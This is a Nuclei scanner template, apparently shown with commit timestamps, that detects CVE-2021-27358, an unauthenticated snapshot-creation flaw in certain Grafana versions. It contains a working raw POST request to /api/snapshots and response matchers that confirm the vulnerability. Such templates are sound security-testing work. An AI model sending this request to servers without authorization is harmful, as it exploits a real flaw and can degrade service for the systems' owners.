2021-12-24 12:17:55 +00:00
id : CVE-2021-27358
info :
author : pdteam
name : Grafana unauthenticated snapshot creation
severity : high
description : The snapshot feature in Grafana 6.7.3 through 7.4.1 can allow an unauthenticated remote attackers to trigger a Denial of Service via a remote API call if a commonly used configuration is set.
reference :
2021-12-24 13:32:18 +00:00
- https://phabricator.wikimedia.org/T274736
2021-12-24 12:17:55 +00:00
- https://grafana.com/docs/grafana/latest/release-notes/release-notes-7-4-2/
- https://nvd.nist.gov/vuln/detail/CVE-2021-27358
2021-12-24 13:32:18 +00:00
tags : cve,cve2021,grafana,unauth
2021-12-24 13:38:52 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score : 7.50
cve-id : CVE-2021-27358
2021-12-24 12:17:55 +00:00
requests :
- raw :
- |
POST /api/snapshots HTTP/1.1
Host : {{Hostname}}
Accept : application/json
Content-Type : application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600 }
2021-12-24 13:32:18 +00:00
matchers-condition : and
2021-12-24 12:17:55 +00:00
matchers :
- part : body
type : word
words :
2021-12-24 13:32:18 +00:00
- '"deleteUrl":'
- '"deleteKey":'
condition : and
- type : word
part : header
words :
- "application/json"